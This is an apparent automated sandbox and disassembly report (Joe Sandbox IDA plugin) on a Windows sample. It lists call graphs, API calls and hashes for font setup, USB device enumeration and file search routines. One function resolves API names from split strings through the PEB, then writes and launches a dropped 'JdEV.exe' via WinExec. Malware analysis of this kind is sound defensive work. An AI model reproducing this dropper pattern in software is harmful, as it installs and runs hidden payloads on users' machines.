ctype 51268->51272 51366 1c80e0 70 API calls 2 library calls 51269->51366 51271 1c2d4a 51271->51029 51367 1c4fa0 70 API calls 2 library calls 51272->51367 51274 1c2d83 51274->51029 51276 1cba41 __EH_prolog3 51275->51276 51277 1c8070 ctype 70 API calls 51276->51277 51278 1cba57 51277->51278 51279 1cba85 51278->51279 51280 1cacff ~_Task_impl 2 API calls 51278->51280 51281 1cba9e 51279->51281 51368 1ca6b5 70 API calls 51279->51368 51280->51279 51283 1c5e30 70 API calls 51281->51283 51284 1cbab9 ctype ~_Task_impl 51283->51284 51284->51027 51285->51024 51286->51216 51287->51218 51292 2bce6a _memmove 51288->51292 51293 2bce6e _memset 51288->51293 51289 2bce74 51297 2be629 70 API calls __getptd_noexit 51289->51297 51291 2bce79 51298 2c406b 11 API calls __wcsicmp_l 51291->51298 51292->51220 51293->51289 51293->51292 51294 2bceb9 51293->51294 51294->51292 51299 2be629 70 API calls __getptd_noexit 51294->51299 51297->51291 51298->51292 51299->51291 51300->51239 51301->51244 51302->51246 51303->51249 51304->51251 51305->51253 51306->51263 51312 2bd077 51307->51312 51313 2bd08a 51312->51313 51319 2bd0d7 51312->51319 51353 2c5dc1 70 API calls 2 library calls 51313->51353 51315 2bd08f 51316 2bd0b7 51315->51316 51354 2c5b5b 78 API calls 6 library calls 51315->51354 51316->51319 51355 2c53da 72 API calls 6 library calls 51316->51355 51320 2bd2b8 51319->51320 51321 2bd2e8 _wcsnlen 51320->51321 51322 2bd2d4 51320->51322 51321->51322 51325 2bd2ff 51321->51325 51356 2be629 70 API calls __getptd_noexit 51322->51356 51324 2bd2d9 51357 2c406b 11 API calls __wcsicmp_l 51324->51357 51330 2bd2e3 51325->51330 51358 2c60f3 LCMapStringW _wcsnlen 51325->51358 51328 2bd345 51331 2bd368 51328->51331 51332 2bd351 51328->51332 51329 2bc787 _wcsupr_s_l_stat 5 API calls 51335 2bd426 51329->51335 51330->51329 51334 2bd36d 51331->51334 51343 2bd37e 51331->51343 51359 2be629 70 API calls __getptd_noexit 51332->51359 51361 2be629 70 API calls __getptd_noexit 51334->51361 51335->51029 51336 2bd356 51360 2be629 70 API calls __getptd_noexit 51336->51360 51338 2bd3c9 51362 2be629 70 API calls __getptd_noexit 51338->51362 51339 2bd3d6 51363 2c60f3 LCMapStringW _wcsnlen 51339->51363 51344 2be4b1 _malloc 70 API calls 51343->51344 51346 2bd399 _wcsupr_s_l_stat 51343->51346 51344->51346 51345 2bd3e9 51347 2bd401 51345->51347 51348 2bd3f0 51345->51348 51346->51338 51346->51339 51364 2be629 70 API calls __getptd_noexit 51347->51364 51350 2be545 _wcsupr_s_l_stat 70 API calls 51348->51350 51351 2bd3fa 51350->51351 51365 26caa0 70 API calls _free 51351->51365 51353->51315 51354->51316 51355->51319 51356->51324 51357->51330 51358->51328 51359->51336 51360->51330 51361->51324 51362->51336 51363->51345 51364->51351 51365->51330 51366->51271 51367->51274 51368->51281 51369->51046 51370->51048 51371->51050 51372->51053 51373->51055 51374->51059 51375->51061 51376->51051 51377->51080 51378->51085 51379->51089 51380->51088 51381->51101 51382->51096 51383->51100 51385 1c8aab 51384->51385 51390 1caf3a 51385->51390 51386 1c8ab9 ctype 51387 2bce5d _memcpy_s 70 API calls 51386->51387 51388 1c8ae3 51387->51388 51388->50899 51391 1caf4e 51390->51391 51392 1caf4a 51390->51392 51393 2be4b1 _malloc 70 API calls 51391->51393 51392->51386 51393->51392 51394->51123 51395 1c33d0 51396 1c3410 51395->51396 51397 1c343b 51396->51397 51405 1c4210 51396->51405 51399 1c3483 moneypunct 51397->51399 51402 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 51397->51402 51411 2d8408 DeleteCriticalSection moneypunct 51399->51411 51401 1c34ac 51403 1c3462 51402->51403 51404 2d8508 std::ios_base::_Addstd LeaveCriticalSection 51403->51404 51404->51399 51406 1c421e 51405->51406 51407 1c4232 51405->51407 51412 1c4340 51406->51412 51407->51397 51410 2be05b 106 API calls 51410->51407 51411->51401 51415 1c4377 51412->51415 51419 1c43f2 51412->51419 51413 2bc787 _wcsupr_s_l_stat 5 API calls 51414 1c4223 51413->51414 51414->51410 51417 1c450d 51415->51417 51415->51419 51422 2bd77e 103 API calls 4 library calls 51415->51422 51423 1c77e0 71 API calls 5 library calls 51415->51423 51424 2d8541 71 API calls 2 library calls 51417->51424 51419->51413 51420 1c4517 51422->51415 51423->51415 51424->51420 51425 237c0e 51426 237c1a __EH_prolog3 ctype 51425->51426 51427 237d08 51426->51427 51428 237cdf CreateCompatibleDC CreateCompatibleDC 51426->51428 51434 237836 350 API calls 4 library calls 51427->51434 51429 237cff 51428->51429 51429->51427 51433 1cfc45 RaiseException __CxxThrowException@8 51429->51433 51432 237d9a ~_Task_impl 51434->51432

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 1ce757-1ce7ae call 2beabf call 1d0431 GetDeviceCaps 5 1ce7c9 0->5 6 1ce7b0-1ce7bf 0->6 7 1ce7cb 5->7 6->7 8 1ce7c1-1ce7c7 6->8 9 1ce7cd-1ce7db 7->9 8->9 10 1ce7dd-1ce7e0 9->10 11 1ce7ea-1ce7f8 9->11 10->11 14 1ce7e2-1ce7e8 call 1d060a DeleteObject 10->14 12 1ce7fa-1ce7fd 11->12 13 1ce807-1ce815 11->13 12->13 15 1ce7ff-1ce805 call 1d060a DeleteObject 12->15 16 1ce824-1ce82c 13->16 17 1ce817-1ce81a 13->17 14->11 15->13 21 1ce82e-1ce831 16->21 22 1ce83b-1ce849 16->22 17->16 20 1ce81c-1ce822 call 1d060a DeleteObject 17->20 20->16 21->22 26 1ce833-1ce839 call 1d060a DeleteObject 21->26 27 1ce858-1ce860 22->27 28 1ce84b-1ce84e 22->28 26->22 30 1ce86f-1ce877 27->30 31 1ce862-1ce865 27->31 28->27 29 1ce850-1ce856 call 1d060a DeleteObject 28->29 29->27 36 1ce879-1ce87c 30->36 37 1ce886-1ce88e 30->37 31->30 35 1ce867-1ce86d call 1d060a DeleteObject 31->35 35->30 36->37 41 1ce87e-1ce884 call 1d060a DeleteObject 36->41 42 1ce89d-1ce8ab 37->42 43 1ce890-1ce893 37->43 41->37 44 1ce8ad-1ce8b0 42->44 45 1ce8ba-1ce8c2 42->45 43->42 48 1ce895-1ce89b call 1d060a DeleteObject 43->48 44->45 50 1ce8b2-1ce8b8 call 1d060a DeleteObject 44->50 51 1ce8c4-1ce8c7 45->51 52 1ce8d1-1ce929 call 1cd0a7 call 2bf570 GetTextCharsetInfo 45->52 48->42 50->45 51->52 56 1ce8c9-1ce8cf call 1d060a DeleteObject 51->56 64 1ce92b-1ce92e 52->64 65 1ce930 52->65 56->52 66 1ce931-1ce937 64->66 65->66 67 1ce939 66->67 68 1ce93b-1ce953 lstrcpyW 66->68 67->68 69 1ce9bb-1cea0c CreateFontIndirectW call 1d05dc call 2c1729 call 2c19d0 68->69 70 1ce955-1ce95c 68->70 83 1cea0e 69->83 84 1cea11-1ceb12 CreateFontIndirectW call 1d05dc call 1cd0a7 CreateFontIndirectW call 1d05dc CreateFontIndirectW call 1d05dc CreateFontIndirectW call 1d05dc GetSystemMetrics lstrcpyW CreateFontIndirectW call 1d05dc GetStockObject 69->84 70->69 71 1ce95e-1ce97a EnumFontFamiliesW 70->71 73 1ce97c-1ce98c lstrcpyW 71->73 74 1ce98e-1ce9a8 EnumFontFamiliesW 71->74 73->69 77 1ce9aa-1ce9b0 74->77 78 1ce9b2 74->78 80 1ce9b8-1ce9b9 lstrcpyW 77->80 78->80 80->69 83->84 97 1ceb18-1ceb28 GetObjectW 84->97 98 1ceb9a-1cebf5 GetStockObject call 1d05c8 GetObjectW CreateFontIndirectW call 1d05dc CreateFontIndirectW call 1d05dc call 1cd2a2 84->98 97->98 99 1ceb2a-1ceb95 lstrcpyW CreateFontIndirectW call 1d05dc CreateFontIndirectW call 1d05dc 97->99 111 1cec23-1cec25 98->111 99->98 112 1cebf7-1cebfb 111->112 113 1cec27-1cec3b call 1cdc8f 111->113 114 1cebfd-1cec0b 112->114 115 1cec55-1cede9 call 1cacff call 2beabf GetVersionExW KiUserCallbackDispatcher 112->115 119 1cec40-1cec54 call 1d0485 call 2beb42 113->119 114->115 118 1cec0d-1cec17 call 1d8fc5 114->118 129 1cedfb 115->129 130 1cedeb-1cedf2 115->130 118->111 127 1cec19-1cec1b 118->127 127->111 133 1cee01-1cee03 129->133 134 1cedfd-1cedff 129->134 132 1cedf4 130->132 130->133 132->129 135 1cee04-1cee43 call 1ce141 call 1c94e4 133->135 134->135 140 1ceeb4-1ceed2 135->140 141 1cee45-1ceeb2 GetProcAddress * 6 135->141 142 1ceed8-1ceeeb call 1cd20c 140->142 141->142 145 1ceeed-1cef21 GetProcAddress * 3 142->145 146 1cef23-1cef2f 142->146 147 1cef35-1cef72 call 1ce757 145->147 146->147 149 1cef77-1ceff8 call 1ccd68 call 2beb42 147->149
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001CE761
                                                                    • Part of subcall function 001D0431: __EH_prolog3.LIBCMT ref: 001D0438
                                                                    • Part of subcall function 001D0431: GetWindowDC.USER32(00000000,00000004,001CE19D,00000000,?,?,002F5254), ref: 001D0464
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 001CE787
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE7E8
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE805
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE822
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE839
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE856
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE86D
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE884
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE89B
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE8B8
                                                                  • DeleteObject.GDI32(00000000), ref: 001CE8CF
                                                                  • _memset.LIBCMT ref: 001CE8F0
                                                                  • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 001CE900
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 001CE94F
                                                                  • EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 001CE976
                                                                  • lstrcpyW.KERNEL32(?), ref: 001CE986
                                                                  • EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 001CE9A1
                                                                  • lstrcpyW.KERNEL32(?), ref: 001CE9B9
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CE9C5
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEA15
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEA5A
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEA82
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEA9F
                                                                  • GetSystemMetrics.USER32(00000048), ref: 001CEABA
                                                                  • lstrcpyW.KERNEL32(?), ref: 001CEACE
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEAD4
                                                                  • GetStockObject.GDI32(00000011), ref: 001CEB02
                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 001CEB24
                                                                  • lstrcpyW.KERNEL32(?), ref: 001CEB5D
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEB67
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEB86
                                                                  • GetStockObject.GDI32(00000011), ref: 001CEB9C
                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 001CEBAD
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEBB7
                                                                  • CreateFontIndirectW.GDI32(?), ref: 001CEBDA
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001CEC65
                                                                  • GetVersionExW.KERNEL32(?,0000011C), ref: 001CEDBB
                                                                  • KiUserCallbackDispatcher.NTDLL(00001000), ref: 001CEDC6
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 001CEE4B
                                                                  • GetProcAddress.KERNEL32(?,DrawThemeTextEx), ref: 001CEE5E
                                                                  • GetProcAddress.KERNEL32(?,BufferedPaintInit), ref: 001CEE71
                                                                  • GetProcAddress.KERNEL32(?,BufferedPaintUnInit), ref: 001CEE84
                                                                  • GetProcAddress.KERNEL32(?,BeginBufferedPaint), ref: 001CEE97
                                                                  • GetProcAddress.KERNEL32(?,EndBufferedPaint), ref: 001CEEAA
                                                                  • GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 001CEEF3
                                                                  • GetProcAddress.KERNEL32(?,DwmDefWindowProc), ref: 001CEF06
                                                                  • GetProcAddress.KERNEL32(?,DwmIsCompositionEnabled), ref: 001CEF19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Font$CreateDeleteIndirect$AddressProc$lstrcpy$EnumFamiliesH_prolog3H_prolog3_Stock$CallbackCapsCharsetDeviceDispatcherException@8InfoMetricsSystemTextThrowUserVersionWindow_memset
                                                                  • String ID: BeginBufferedPaint$BufferedPaintInit$BufferedPaintUnInit$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
                                                                  • API String ID: 283818339-1174303547
                                                                  • Opcode ID: d95c768d3b0a653ca4c2baff279a5af1417e1e3e0504121f1e8bd73ed0f79ffd
                                                                  • Instruction ID: e238786531200dd1f4ca66e2f272c3d64e2cf1435b63c81d84619563ac1385f3
                                                                  • Opcode Fuzzy Hash: d95c768d3b0a653ca4c2baff279a5af1417e1e3e0504121f1e8bd73ed0f79ffd
                                                                  • Instruction Fuzzy Hash: AD3217B08017599FCB21DFB5C884BDAFBF8AF69700F00496EE5AAA7251DB709941CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 482 1c2540-1c2580 SetupDiGetClassDevsW 483 1c2a18-1c2a36 call 2bc787 482->483 484 1c2586-1c259b call 1caf34 482->484 489 1c259d-1c25a2 call 1c8c10 484->489 490 1c25a7-1c25ca SetupDiEnumDeviceInfo 484->490 489->490 493 1c2664-1c2685 SetupDiGetDeviceRegistryPropertyW 490->493 494 1c25d0-1c25da GetLastError 490->494 497 1c26e4 493->497 498 1c2687-1c2692 GetLastError 493->498 495 1c25e0-1c25e7 GetLastError 494->495 496 1c29f2 494->496 495->496 500 1c25ed-1c261f GetLastError call 1c6400 call 1c2e70 call 1c8330 495->500 502 1c29f3-1c2a0c SetupDiDestroyDeviceInfoList 496->502 499 1c26ea-1c26ef GetLastError 497->499 498->499 501 1c2694-1c2699 GetLastError 498->501 503 1c26f5-1c2701 499->503 504 1c29c2-1c29dd SetupDiEnumDeviceInfo 499->504 527 1c2638-1c2641 500->527 528 1c2621-1c2631 500->528 501->500 506 1c269f-1c26a4 501->506 502->483 507 1c2a0e-1c2a13 502->507 503->504 508 1c2707 503->508 509 1c2662 504->509 510 1c29e3 504->510 512 1c26ad-1c26bf LocalAlloc 506->512 513 1c26a6-1c26a7 LocalFree 506->513 507->483 515 1c2716-1c271e 508->515 509->493 519 1c29e8-1c29ed call 1c8c10 510->519 512->500 514 1c26c5-1c26e0 SetupDiGetDeviceRegistryPropertyW 512->514 513->512 514->498 517 1c26e2 514->517 515->504 518 1c2724-1c2729 515->518 517->499 521 1c2730-1c2739 518->521 519->496 521->521 524 1c273b-1c2751 call 1c8c60 521->524 524->519 535 1c2757-1c2766 524->535 529 1c2659-1c265d 527->529 530 1c2643-1c264c 527->530 528->527 536 1c2633 528->536 529->502 533 1c264e 530->533 534 1c2651-1c2654 call 1c8570 530->534 533->534 534->529 538 1c2768-1c2771 call 1c8b70 535->538 539 1c2774-1c2784 call 2bd2a1 535->539 536->527 538->539 539->519 544 1c278a-1c2796 539->544 545 1c2798-1c27a8 call 2bcfe9 544->545 546 1c27b3-1c27b7 544->546 545->546 554 1c27aa-1c27b1 545->554 548 1c27bd-1c27cd call 2bcfe9 546->548 549 1c299e-1c29a0 546->549 558 1c27cf-1c27d6 548->558 559 1c27d8-1c27dc 548->559 550 1c29a3-1c29ac 549->550 550->550 553 1c29ae-1c29bc 550->553 553->504 556 1c2710-1c2713 553->556 554->546 557 1c282a-1c2837 lstrlenW 554->557 556->515 560 1c2839-1c2847 call 2c2b20 557->560 561 1c286a 557->561 558->557 558->559 559->549 562 1c27e2-1c27f2 call 2bcfe9 559->562 560->561 572 1c2849-1c2868 WideCharToMultiByte 560->572 565 1c286c-1c289f call 1c6400 * 2 call 1c8330 561->565 570 1c27fd-1c2801 562->570 571 1c27f4-1c27fb 562->571 581 1c28b8-1c28c1 565->581 582 1c28a1-1c28b1 565->582 570->549 574 1c2807-1c2817 call 2bcfe9 570->574 571->557 571->570 572->565 574->549 580 1c281d-1c2824 574->580 580->549 580->557 583 1c28d9-1c28e9 lstrlenW 581->583 584 1c28c3-1c28cc 581->584 582->581 592 1c28b3 582->592 588 1c291c 583->588 589 1c28eb-1c28f9 call 2c2b20 583->589 586 1c28ce 584->586 587 1c28d1-1c28d4 call 1c8570 584->587 586->587 587->583 591 1c291e-1c2951 call 1c6400 * 2 call 1c8330 588->591 589->588 596 1c28fb-1c291a WideCharToMultiByte 589->596 602 1c296a-1c2973 591->602 603 1c2953-1c2963 591->603 592->581 596->591 604 1c298b-1c299b SetupDiCallClassInstaller 602->604 605 1c2975-1c297e 602->605 603->602 610 1c2965 603->610 604->549 606 1c2980 605->606 607 1c2983-1c2986 call 1c8570 605->607 606->607 607->604 610->602
                                                                  APIs
                                                                  • SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,00000004), ref: 001C2572
                                                                  • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,0000001C), ref: 001C25C2
                                                                  • GetLastError.KERNEL32 ref: 001C25D6
                                                                  • GetLastError.KERNEL32 ref: 001C25E0
                                                                  • GetLastError.KERNEL32 ref: 001C25ED
                                                                  • SetupDiGetDeviceRegistryPropertyW.SETUPAPI(00000000,0000001C,00000001,00000000,00000000,00000000,?), ref: 001C2681
                                                                  • GetLastError.KERNEL32 ref: 001C268D
                                                                  • GetLastError.KERNEL32 ref: 001C2694
                                                                  • LocalFree.KERNEL32(?), ref: 001C26A7
                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 001C26B4
                                                                  • SetupDiGetDeviceRegistryPropertyW.SETUPAPI(?,0000001C,00000001,00000000,00000000,?,?), ref: 001C26DC
                                                                  • GetLastError.KERNEL32 ref: 001C26EA
                                                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 001C29F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Setup$Device$InfoLocalPropertyRegistry$AllocClassDestroyDevsEnumFreeList
                                                                  • String ID: Remove $VID_0525$VID_1782$VID_18D1&PID_4EE7$enum device err :
                                                                  • API String ID: 3295277273-2904152880
                                                                  • Opcode ID: a45a7baaad6d8a0884f1efe55ecaff973f04b7efc47d48121376960796db819c
                                                                  • Instruction ID: fb40342946de2898532c6c5faa1ec5d91aa1cc1a9bd568b369b8863206637b83
                                                                  • Opcode Fuzzy Hash: a45a7baaad6d8a0884f1efe55ecaff973f04b7efc47d48121376960796db819c
                                                                  • Instruction Fuzzy Hash: 65E1D371A002159FDB14DB68DC85FAEB7A5EFA4724F15461CE815EB2D0DB70ED02CBA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 733 366044-366074 GetPEB 734 366077-36609a 733->734 735 36609d-3660a0 734->735 736 3660a6-3660bc 735->736 737 3661ee-36622b CreateFileA 735->737 738 366110-366116 736->738 739 3660be-3660c5 736->739 754 366265-366269 737->754 755 36622d-366230 737->755 741 366118-36611f 738->741 742 366129-36612f 738->742 739->738 743 3660c7-3660ce 739->743 741->742 744 366121-366124 741->744 745 366131-366138 742->745 746 366148-36614e 742->746 743->738 747 3660d0-3660d7 743->747 749 3661bb-3661c0 744->749 745->746 750 36613a-366141 745->750 751 366167-36616f 746->751 752 366150-366157 746->752 747->738 753 3660d9-3660dd 747->753 757 3661c2-3661c5 749->757 758 3661e0-3661e9 749->758 750->746 756 366143-366146 750->756 760 366171-366178 751->760 761 366188-36618e 751->761 752->751 759 366159-366160 752->759 753->738 762 3660df-3660e3 753->762 765 366232-366238 755->765 756->749 757->758 766 3661c7-3661ca 757->766 758->735 759->751 767 366162-366165 759->767 760->761 768 36617a-366181 760->768 763 3661a7-3661ad 761->763 764 366190-366197 761->764 762->749 769 3660e9-36610b 762->769 763->749 771 3661af-3661b6 763->771 764->763 770 366199-3661a0 764->770 772 366246-366252 WriteFile 765->772 773 36623a-366242 765->773 766->758 774 3661cc-3661cf 766->774 767->749 768->761 775 366183-366186 768->775 769->734 770->763 777 3661a2-3661a5 770->777 771->749 778 3661b8 771->778 780 366255-366262 CloseHandle WinExec 772->780 773->765 779 366244 773->779 774->758 781 3661d1-3661d4 774->781 775->749 777->749 778->749 779->780 780->754 781->758 782 3661d6-3661d9 781->782 782->758 783 3661db-3661de 782->783 783->737 783->758
                                                                  APIs
                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00366223
                                                                  • WriteFile.KERNELBASE(00000000,FFF58236,00003E00,?,00000000), ref: 00366252
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00366256
                                                                  • WinExec.KERNEL32(?,00000005), ref: 00366262
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateExecHandleWrite
                                                                  • String ID: .dll$Clos$Crea$GetM$GetT$JdEV.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                                  • API String ID: 3741012433-349371505
                                                                  • Opcode ID: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
                                                                  • Instruction ID: e87948d43ad4e0595ccaa8070021cdedf5383e362ad75b41eeac699a0c8a8e6d
                                                                  • Opcode Fuzzy Hash: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
                                                                  • Instruction Fuzzy Hash: 4F616E74D01215DFCF25CF94C886AADFBB4BF45391F26C2AAD405AB60AC7709E81CB91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 001CB85E
                                                                  • SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?,00000000,00000000), ref: 001CB86D
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,00000000,00000000), ref: 001CB87A
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 001CB888
                                                                  • __wfullpath.LIBCMT ref: 001CB8D4
                                                                  • __wsplitpath_s.LIBCMT ref: 001CB914
                                                                  • __wmakepath_s.LIBCMT ref: 001CB933
                                                                    • Part of subcall function 001CB3FE: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,001CB85B,?,?,?,?,?,00000000,00000000), ref: 001CB412
                                                                    • Part of subcall function 001CB3FE: GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 001CB422
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressFileFindFirstHandleModuleProc__wfullpath__wmakepath_s__wsplitpath_s_malloclstrlen
                                                                  • String ID: 8)1
                                                                  • API String ID: 1521982810-3231838955
                                                                  • Opcode ID: e74df7e82280d02d469b8ddfdb8d65563e4e5d91da78354bc8232bb0321d9edc
                                                                  • Instruction ID: 2b5151b29e00818c8879d4cba3b53d667ec63c20e9412e75c05091939c20099f
                                                                  • Opcode Fuzzy Hash: e74df7e82280d02d469b8ddfdb8d65563e4e5d91da78354bc8232bb0321d9edc
                                                                  • Instruction Fuzzy Hash: F641BF71A04218BBCB10AB758CCAFAFB7ACEF68310F10456DF51AD6192DB74D950CBA1
                                                                  APIs
                                                                  • GetCommandLineW.KERNEL32(00000000,6B722804), ref: 001C1057
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,00000000), ref: 001C1060
                                                                    • Part of subcall function 001CA2C5: SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2D3
                                                                    • Part of subcall function 001CA2C5: SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2DB
                                                                  • _wprintf.LIBCMT ref: 001C1075
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00312A58,00000000), ref: 001C10D0
                                                                  • GetLastError.KERNEL32 ref: 001C10DE
                                                                  • _wcsnlen.LIBCMT ref: 001C11A9
                                                                  • _memset.LIBCMT ref: 001C1245
                                                                  • _wcsrchr.LIBCMT ref: 001C12E8
                                                                  • lstrlenW.KERNEL32(?,?,00000001,?,?), ref: 001C13BF
                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,?,?), ref: 001C13ED
                                                                  • lstrlenW.KERNEL32(?,0000000A,?,?,?,00000001,?,?), ref: 001C148F
                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?,?,00000001,?,?), ref: 001C14BD
